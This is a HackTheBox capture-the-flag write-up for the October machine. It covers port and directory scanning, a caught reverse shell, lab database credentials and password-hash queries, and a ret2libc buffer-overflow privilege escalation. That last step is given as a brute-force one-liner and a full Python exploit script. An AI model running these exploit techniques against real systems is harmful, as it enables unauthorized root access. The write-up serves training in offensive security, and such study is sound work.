October — Write-up — HackTheBox

Reconnaissance

echo '10.10.10.16    october.htb' >> /etc/hosts
export IP=october.htb

nmap -vv -sV -sT -p- -O -A -oN nmap_scan.txt $IP

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBANmRR7UDp17vLPWjPYGFFxhFHygkw1gVmWZCAUO+TBY4OPnIWGRwrG+zyo39zVror9IS7wgI8rGUuwSd0Yc0xOYl>
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Txq4c0jb5/pJpdDRWMw6kGit+0TeEKq3yWPLLPifxMillxkW1P4j51ANiLUE9wQjzBticFF4Ql6l>
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWJqXjmPMM11lDdFy512ITtTx1mh4bP6jxTLmGYtSBY>
| 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA/9PENIoYUITEQDOKLYfiaUxVAgpixE8w//rH53DU7u
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1D585CCF71E2EB73F03BCF484CFC2259
| http-methods:
| Supported Methods: GET HEAD POST PUT PATCH DELETE OPTIONS
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
root@kali:/home/czar/Downloads/HTB/october# dirb http://october.htb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: ./dirb_out.txt
URL_BASE: http://october.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Interactive Recursion

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://october.htb/ ----
+ http://october.htb/account (CODE:200|SIZE:264)
+ http://october.htb/backend (CODE:302|SIZE:400)
(Location: 'http://october.htb/backend/backend/auth')
+ http://october.htb/blog (CODE:200|SIZE:229)
+ http://october.htb/Blog (CODE:200|SIZE:229)
==> DIRECTORY: http://october.htb/config/
+ http://october.htb/error (CODE:200|SIZE:177)
+ http://october.htb/forgot-password (CODE:200|SIZE:206)
+ http://october.htb/forum (CODE:200|SIZE:383)

/backend redirects to backend/auth, the October CMS administration login. The reverse shell below runs as www-data, the Apache user.
root@kali:/home/czar/Downloads/HTB/october# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.16] 52160
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
19:50:45 up 23 min, 0 users, load average: 10.06, 11.38, 13.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1307): Inappropriate ioctl for device
bash: no job control in this shell
www-data@october:/$ python -c "import pty;pty.spawn('/bin/bash')"

MySQL

cat /var/www/html/cms/config/database.php
--- SNIP ---
'mysql' => [
'driver' => 'mysql',
'host' => 'localhost',
'port' => '',
'database' => 'october',
'username' => 'october',
'password' => 'OctoberCMSPassword!!',
'charset' => 'utf8',
'collation' => 'utf8_unicode_ci',
'prefix' => '',

With those credentials, in the MySQL client:

use october;
show tables;
select * from users;          -- accounts registered through the web app
select * from backend_users;  -- backend (admin panel) accounts: we get the password hashes for both harry and admin

Buffer Overflow and ASLR Brute Force

The box is 32-bit (i686, see the uname output above), where libc gets only 8 bits of ASLR entropy, so instead of leaking an address we hardcode one libc base and rerun the binary until the mapping lands there. The payload is a classic ret2libc frame: 112 bytes of filler up to the saved return address, then the address of system(), then the address of exit() as the return address for system(), then a pointer to the "/bin/sh" string inside libc as system()'s argument. Every miss segfaults; the hit drops into a shell.

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x23\x5d\xb7" + "\x06\x52\x5c\xb7" + "\xac\x4b\x6f\xb7"'); done
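The same brute force as a Python 3 script, added here as an example rather than taken from the original write-up. The offset and the three libc addresses are the ones used in the one-liner above; the binary path is the one from the box. The rebase() helper and the NUL-byte check are my additions: ASLR slides the whole libc mapping as one unit, so the distances between system(), exit() and "/bin/sh" are fixed and only the base is guessed, and because the payload travels through argv it must not contain a 0x00 byte.

```python
"""Added example (not the write-up's own code): ret2libc payload builder and
ASLR brute-force loop for the 32-bit ovrflw binary."""
import os
import signal
import struct
import subprocess
import sys

# Values taken from the write-up's one-liner.
OFFSET = 112                # filler bytes before the saved return address
SYSTEM_ADDR = 0xb75d2310    # system() for the libc base we are betting on
EXIT_ADDR = 0xb75c5206      # exit(), used as system()'s return address
BINSH_ADDR = 0xb76f4bac     # "/bin/sh" string inside the same libc mapping
BINARY = "/usr/local/bin/ovrflw"


def p32(value):
    """Pack a 32-bit little-endian address for the i686 target."""
    return struct.pack("<I", value & 0xffffffff)


def build_payload(system_addr=SYSTEM_ADDR, exit_addr=EXIT_ADDR,
                  binsh_addr=BINSH_ADDR, offset=OFFSET):
    """ret2libc frame: filler, system(), system()'s return address (exit()),
    then system()'s single argument, a pointer to "/bin/sh"."""
    return (b"\x90" * offset + p32(system_addr) + p32(exit_addr)
            + p32(binsh_addr))


def rebase(system_addr):
    """Return (system, exit, binsh) for a different guessed system() location.
    The relative distances inside libc never change; only the base does."""
    delta = system_addr - SYSTEM_ADDR
    return (SYSTEM_ADDR + delta, EXIT_ADDR + delta, BINSH_ADDR + delta)


def argv_safe(payload):
    """argv strings are NUL-terminated, so a 0x00 byte would truncate the payload."""
    return b"\x00" not in payload


def brute_force(binary=BINARY, payload=None, max_attempts=5000):
    """Run the target with the payload until the guessed libc base is right.
    A wrong guess crashes (SIGSEGV/SIGILL/SIGBUS); a right one hands us a shell
    on our own stdin/stdout. Returns the attempt count on a hit, else None."""
    payload = build_payload() if payload is None else payload
    if not argv_safe(payload):
        raise ValueError("payload contains a NUL byte and cannot pass through argv")
    crash_codes = {-signal.SIGSEGV, -signal.SIGILL, -signal.SIGBUS}
    for attempt in range(1, max_attempts + 1):
        # stdio is inherited, so the spawned /bin/sh is interactive on a hit.
        proc = subprocess.run([binary, payload])
        if proc.returncode not in crash_codes:
            return attempt
    return None


if __name__ == "__main__":
    if not os.path.exists(BINARY):
        sys.exit("%s not found; run this on the target" % BINARY)
    used = brute_force()
    print("shell returned after %d attempts" % used if used else "no hit")
```

Like the shell loop, this treats any non-crash exit as a hit, so a wrong base that happens to land on executable but harmless code will also stop the loop; rerun it if the process exits without giving you a prompt.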
